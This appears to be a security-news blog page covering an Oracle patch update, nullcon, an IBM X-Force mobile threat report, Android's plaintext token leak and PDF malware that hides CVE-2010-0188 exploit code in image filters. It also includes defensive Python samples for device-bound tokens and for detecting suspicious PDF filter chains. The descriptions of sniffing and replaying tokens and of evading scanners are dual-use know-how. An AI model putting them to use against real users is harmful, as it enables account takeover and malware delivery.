The Fusion Middleware vulnerabilities affect Oracle Help, HTTP Server, JRockit, Outside In Technology, Security Service, WebLogic Server, Portal and Single Sign-On. Oracle has assigned the highest severity score of 10 to vulnerabilities affecting Fusion Middleware. 4 vulnerabilities will be fixed in Oracle Applications, 2 of which are exploitable without authentication; they have been assigned a base score of 4.3 and affect Application Object Library, Applications Install and Web ADI. The update will resolve a flaw in the Supply Chain Products suite, which is exploitable without authentication; the highest base score for a vulnerability in the Supply Chain Products suite is 4.3, and it affects the Agile technology program.

14 security flaws related to the PeopleSoft suite will be fixed in the upcoming critical patch, 1 of which is exploitable without authentication. The highest base score for security flaws associated with the PeopleSoft suite is 4.3, and they affect PeopleSoft Enterprise, Enterprise CRM, ELS, HRMS and PeopleTools. The critical patch update will resolve 8 issues associated with the JD Edwards suite, 7 of which are exploitable without authentication. The highest base score for vulnerabilities in the JD Edwards suite is 6.4, affecting EnterpriseOne Tools.

The update will address a vulnerability in industry applications, which affects InForm; the highest base score for industry applications is 5.5. 8 security flaws will be mitigated in the Sun products suite, seven of which are exploitable without authentication. Oracle has assigned the highest severity score of 10 to security flaws affecting the Sun products suite. The components affected include Java Dynamic Management Kit, Java System Web Server, Solaris, OpenSSO Enterprise, GlassFish Enterprise Server, Java System Application Server, Java System Access Manager Policy Agent and Java System Messaging Server.

The upcoming critical patch update will fix 8 security issues in the OpenOffice suite, of which 7 are exploitable without authentication. The highest base score for security flaws in the OpenOffice suite is 9.3. OpenOffice, StarOffice and StarSuite are affected by the vulnerabilities.

Vulnerabilities are identified by professionals qualified in IT degree programs and security certifications such as penetration testing. Developers encourage both in-house and independent security researchers to detect and report security flaws so that they can be mitigated before exploitation by attackers.

Online IT courses, e-tutorials, security blogs and alerts from computer emergency response teams can help users gain insight into security threats, their implications and the importance of security updates. Users must keep track of security releases and install the necessary updates to safeguard their systems and data from unauthorized access.


Nullcon - International Security Conference [Goa 2012]



null - The open security community is a registered non-profit society and by far the largest security community in India, with more than 2000 members comprising information security professionals, ethical hackers and law enforcement professionals, and it focuses on infosec research and on assisting Govt. and private organizations with cyber security issues. null has 7 chapters throughout India - Pune, Bangalore, Mumbai, Hyderabad, Delhi, Chennai and Bhopal - and interacts with around 5000-6000 people through activities such as monthly meets, security camps, workshops, talks at various events and organizations, and security projects.

The nullcon portal http://null.co.in provides free information on security research, responsible vulnerability disclosure, open source security software projects, white papers, presentations and monthly chapter meets.

We see that currently there is a disconnect between the Govt. agencies and private organizations when it comes to cyber security and aim to fill the gap in a vendor neutral way. We have many projects running that help organizations tighten their security infrastructure, including Keeda Project and nullcon - International Security Conference and Trainings.

The Keeda Project is a database of vulnerabilities found in the wild, reported to us by members or anonymous researchers. We act on each report by immediately contacting the organization concerned and the respective CERT with information on the vulnerability, and we assist them in mitigating the threats.
As a part of null initiatives we organize nullcon - International Security Conference (http://nullcon.net), our annual flag-ship event. It is held in Goa in the month of February. At nullcon we call upon security experts from around the world to deliver talks and workshops on the latest technology and techniques in the security and hacking world. The talks range from web hacking, security & hacking tools, smart phone hacking, cyber warfare to zero day vulnerabilities.

The year 2012 marks a revolutionary change and unprecedented expansion in the way nullcon is organized. With the overwhelming support of our esteemed sponsors, enthusiastic participants and volunteers, null is organizing TWO conferences in 2012: nullcon Goa on 15-18th Feb 2012 and nullcon Delhi in Oct 2012.
nullcon Goa continues to be a mix of hacking, security and business briefings with a lot of technical events for all the security geeks.
nullcon Delhi will focus more on the Corporate and the Government sector. It will include events geared towards business prospects in information security such as the exquisite Exhibit Space and Demo Zone for cutting-edge technology and products, business networking events and parties.




Exclusive Threat Report on Mobile Security Breach By IBM X-FORCE TEAM

The number of mobile security exploits is on track to double year over year between 2010 and 2011. “For years, observers have been wondering when malware would become a real problem for the latest generation of mobile devices,” said Tom Cross, a manager at IBM’s X-Force security research arm. “It appears that the wait is over.”
X-Force security experts research and evaluate vulnerabilities and security issues, develop assessment and countermeasure technology and educate the public about emerging web and mobile threats. In a new report on mobile and general Internet security, X-Force researchers found that the combination of new vulnerabilities and more sophisticated phone-hacking technology has led to a huge spike in the number of security exploits on mobile phones.
Add to that the fact that more people are storing more information worth stealing on their phones — including corporate information, since more smartphones and tablets are appearing in the workplace — and you have a perfect storm for criminally focused mobile hacking. The X-Force Mid-Year Trend and Risk Report, released today, is based on data gathered through IBM’s research of public vulnerability disclosures as well as the team’s monitoring and analysis of around 12 billion security events daily since the beginning of the year.
Among the report’s findings is the fact that in 2011, mobile users will experience twice the number of mobile exploit releases as last year. Much of this is due to the fact that, as X-Force researchers observed, “many mobile phone vendors do not rapidly push out security updates for their devices.”

The report urges consumers to be cautious about downloading apps that don’t come from an official app store. Third-party app stores or off-market apps are more likely than officially sanctioned apps to contain malicious (and highly monetizable) software.


Cross gives these six tips for consumers to protect themselves from the threat of a mobile attack:-

  • Make sure you protect access to your phone with a password or PIN to keep intruders out if your phone is lost or stolen.
  • Don’t download applications from third-party application markets.
  • Make sure you install system updates as prompted.
  • Back up your data on a regular basis.
  • Have the ability to track your phone and remotely wipe all its data if it is stolen. You can easily find an app that will allow you to do so.
  • Download and run anti-malware applications.

The X-Force team said the number of critical, non-mobile security vulnerabilities has tripled in 2011, and researchers particularly noted the practice of “whaling.” As opposed to “phishing,” a technique that casts a wide net to capture sensitive information, whaling implies that the criminal or criminals behind the attack are zeroing in on a “big fish,” a high-profile target. Phishing has lately been on the decline, but whaling, which targets those positioned at high levels of an organization with access to critical data, is on the rise.


“Although we understand how to defend against many of these attacks on a technical level, organizations don’t always have the cross-company operational practices in place to protect themselves,” said Cross.




-News Source (IBM X-Force Team & Mobile Beat)




Android handsets 'leak' personal data


More than 99% of Android phones are potentially leaking data that, if stolen, could be used to get the information they store online.
The data being leaked is typically used to get at web-based services such as Google Calendar.
The discovery was made by German security researchers looking at how Android phones handle identification information.
Google has yet to comment on the loophole uncovered by the researchers.
ID attack
University of Ulm researchers Bastian Konings, Jens Nickels, and Florian Schaub made their discovery while watching how Android phones handle login credentials for web-based services.
Many applications installed on Android phones interact with Google services by asking for an authentication token - essentially a digital ID card for that app. Once issued the token removes the need to keep logging in to a service for a given length of time.
Sometimes, found the researchers, these tokens are sent in plain text over wireless networks. This makes the tokens easy to spot so criminals eavesdropping on the wi-fi traffic would be able to find and steal them, suggest the researchers.
Armed with the token, criminals would be able to pose as a particular user and get at their personal information.
Even worse, found the researchers, tokens are not bound to particular phones or time of use so they can be used to impersonate a handset almost anywhere.
"[T]he adversary can gain full access to the calendar, contacts information, or private web albums of the respective Google user," the researchers wrote in a blog post explaining their findings.
Abuse of the loophole might mean some people lose data but other changes may be harder to spot.
"...an adversary could change the stored e-mail address of the victim's boss or business partners hoping to receive sensitive or confidential material pertaining to their business," the team speculated.
There is no suggestion that attackers are exploiting the Android loophole at the moment.
Almost all versions of the Android operating system were passing round unencrypted authentication tokens, found the researchers. It was fixed in version 2.3.4 but, suggest Google figures, only 0.3% of Android phones are running this software.
Some Google services, such as image sharing site Picasa, are still using unencrypted authentication tokens that can be stolen, found the team.
The researchers urged Android phone owners to update their device to avoid falling victim to attacks via the loophole. Google is also known to be working with operators and handset makers to get updates to people faster than at present.
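The two properties the researchers say the leaked tokens lacked, binding to a particular handset and a limited time of use, are what make a stolen token reusable "almost anywhere". As an added example (not Google's implementation, and not from the researchers' post), here is a sketch of a server-side token that carries both properties under an HMAC, so that a token replayed from another device, after its window, or with altered claims is rejected; the key and device identifiers are constructed for the example.

```python
import base64
import binascii
import hashlib
import hmac
import json

# Constructed for the example; a real service keeps this in its secret store.
SERVER_KEY = b"constructed-demo-key-not-a-real-secret"


def issue_token(user: str, device_id: str, ttl_seconds: int, now: float,
                key: bytes = SERVER_KEY) -> str:
    """Mint a token whose MAC covers the user, the issuing device and an expiry time.

    Because the device id and expiry are inside the MAC'd body, a holder of the
    token cannot strip or change them without invalidating the signature."""
    claims = {"user": user, "device": device_id, "exp": int(now) + ttl_seconds}
    body = json.dumps(claims, sort_keys=True, separators=(",", ":")).encode()
    mac = hmac.new(key, body, hashlib.sha256).digest()
    return (base64.urlsafe_b64encode(body).decode() + "."
            + base64.urlsafe_b64encode(mac).decode())


def verify_token(token: str, presenting_device: str, now: float,
                 key: bytes = SERVER_KEY):
    """Return the user the token is valid for, or None if it must be rejected."""
    try:
        body_b64, mac_b64 = token.split(".")
        body = base64.urlsafe_b64decode(body_b64)
        mac = base64.urlsafe_b64decode(mac_b64)
    except (ValueError, binascii.Error):
        return None                      # malformed token
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return None                      # claims altered or MAC forged
    claims = json.loads(body)
    if claims["device"] != presenting_device:
        return None                      # replayed from a different handset
    if now >= claims["exp"]:
        return None                      # outside its validity window
    return claims["user"]


if __name__ == "__main__":
    t = issue_token("alice", "phone-A", ttl_seconds=3600, now=1_000_000)
    print("same phone, in window :", verify_token(t, "phone-A", 1_000_100))   # alice
    print("other phone            :", verify_token(t, "phone-B", 1_000_100))  # None
    print("same phone, expired    :", verify_token(t, "phone-A", 1_003_600))  # None
```

Binding and expiry limit the damage of a leaked token but do not stop the leak itself; the transport still has to be encrypted, which is the fix the article describes for Android 2.3.4.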


PDF Malware Using New Tricks to Exploit Vulnerability


Security researchers have identified a new trick in PDF files being sent as email attachments that obfuscates attack code by encoding it inside an image file.

Malicious PDF files are using a new trick to avoid detection by almost all major antivirus scanners on the market, according to security researchers. Researchers from Avast and Sophos independently noticed PDF files making the rounds in March that weren’t being flagged as malicious but had the ability to compromise a machine just by being opened. The originating address was often suspicious, and the attachments accompanied emails purporting to be an order receipt. The attachments themselves often had names containing the supposed order number.
When the attachments were opened under Adobe 8.1.1 or Adobe 9.3, the compromised computer would connect to a remote site and download malware, usually SpyEye, ZBot or FakeAV, Paul Baccas, a senior threat researcher at Sophos Labs, wrote on the company’s Naked Security blog on April 15.
“The PDFs did not seem to be using any exploit that I could see and yet they were downloading malware,” wrote Baccas.
It turned out these files were using a new trick to re-exploit the CVE-2010-0188 vulnerability Adobe had patched over a year ago on Feb. 16, 2010, according to Baccas.
The exploit is specific to Reader and would not execute in Google Chrome’s PDF Plugin, Jiri Sejtko, a senior virus analyst and researcher at Avast Software, wrote on the company blog April 22. While that’s a good sign, Chrome generally asks users if it should open the file in Reader if it can’t display the file correctly. In this day and age, many users would likely say yes, making them vulnerable, according to Sejtko.
The PDF specifications allow several filters to be used on raw data, either singly or in conjunction with each other, Sejtko said. Anyone can create valid PDF files where the data uses five different filters, or even multiple layers of the same filter. This allows malware authors to embed malicious code deep inside the filters, out of reach of even the most aggressive scanner.
“Our parser was unable to get any suitable content that we could define as malicious,” Sejtko said.
Files exploiting this vulnerability normally use an XML file that contains the raw data for a TIFF image file containing highly obfuscated code, Baccas said. In this case, the attackers were using parameters to control how the filters operate and crafting the attack code embedded in the raw data to conform to these parameters.
The filter being used to encode the malicious code was also meant to be used only for black-and-white images. The exploit detected by Avast researchers combined two filters, one for text and one for images, to hide the payload.
“Who would have thought that a pure image algorithm might be used as a standard filter on any object stream?” Sejtko said. While the “bad guys” are building a specially crafted TIFF image file in the PDF files, the trick can be used to hide special JavaScript and font files, as well.
Compared to other attacks, this attack is seen in “only a very small number” of attacks, Sejtko said, but has also been used in targeted attacks. While the CVE-2010-0188 flaw has been closed in current versions of Adobe Reader, users on older and unpatched versions of the software remain vulnerable to these malicious PDF files.
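The evasion described above leaves a fingerprint in the PDF object structure itself: a stream whose /Filter entry chains several filters, repeats one filter, or applies an image-only filter to something that is not an image. As an added example (not Avast's or Sophos's code), the following inspector walks the stream dictionaries of a constructed PDF fragment and flags those patterns; it assumes the bilevel-image filter the article alludes to is CCITTFaxDecode (the page does not name it), and the stream bodies are placeholders, not real image data.

```python
import re

# Filters the PDF specification defines for image data only; one of these on a
# stream that is not an image XObject is the anomaly the article describes.
IMAGE_ONLY_FILTERS = {"CCITTFaxDecode", "DCTDecode", "JBIG2Decode", "JPXDecode"}


def stream_dicts(data: bytes):
    """Yield (offset, dict_bytes) for the dictionary preceding each 'stream' keyword,
    matching '<<' with '>>' so nested /DecodeParms dictionaries are handled."""
    for m in re.finditer(rb">>\s*stream\b", data):
        end = m.start() + 2              # just past the outer '>>'
        depth, i = 0, end
        while i >= 2:                    # walk backwards to the matching '<<'
            pair = data[i - 2:i]
            if pair == b">>":
                depth += 1
                i -= 2
            elif pair == b"<<":
                depth -= 1
                i -= 2
                if depth == 0:
                    yield i, data[i:end]
                    break
            else:
                i -= 1


def filter_chain(d: bytes) -> list:
    """Return the /Filter names in application order (single name or array form)."""
    m = re.search(rb"/Filter\s*(\[[^\]]*\]|/[A-Za-z0-9]+)", d)
    return [f.decode() for f in re.findall(rb"/([A-Za-z0-9]+)", m.group(1))] if m else []


def suspicious_streams(pdf: bytes) -> list:
    """Flag stream objects whose filter usage matches the evasion pattern."""
    findings = []
    for offset, d in stream_dicts(pdf):
        chain = filter_chain(d)
        is_image = re.search(rb"/Subtype\s*/Image\b", d) is not None
        reasons = []
        if len(chain) > 1:
            reasons.append("multi-filter chain")
        if len(set(chain)) < len(chain):
            reasons.append("same filter applied repeatedly")
        if not is_image and IMAGE_ONLY_FILTERS.intersection(chain):
            reasons.append("image-only filter on a non-image stream")
        if reasons:
            findings.append({"offset": offset, "filters": chain, "reasons": reasons})
    return findings


# Constructed sample: four stream objects, bodies are 4-byte placeholders.
# Object 1 is a legitimate fax-encoded image; 2 and 3 show the two evasions;
# 4 is an ordinary deflated stream and must not be flagged.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /XObject /Subtype /Image /Width 8 /Height 8 /BitsPerComponent 1 "
    b"/ColorSpace /DeviceGray /Filter /CCITTFaxDecode /DecodeParms << /K -1 /Columns 8 >> "
    b"/Length 4 >>\nstream\n\x00\x01\x02\x03\nendstream\nendobj\n"
    b"2 0 obj\n<< /Length 4 /Filter [/FlateDecode /CCITTFaxDecode] "
    b"/DecodeParms [null << /K -1 /Columns 8 >>] >>\nstream\n\x00\x01\x02\x03\nendstream\nendobj\n"
    b"3 0 obj\n<< /Length 4 /Filter [/FlateDecode /FlateDecode /FlateDecode] >>\nstream\n"
    b"\x00\x01\x02\x03\nendstream\nendobj\n"
    b"4 0 obj\n<< /Length 4 /Filter /FlateDecode >>\nstream\n\x00\x01\x02\x03\nendstream\nendobj\n"
)

if __name__ == "__main__":
    for f in suspicious_streams(SAMPLE_PDF):
        print(f)
```

A real scanner would still have to decode the chain to see the payload; the point here is that the structural pattern is visible before any decoding and can be used to route such files for deeper inspection.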

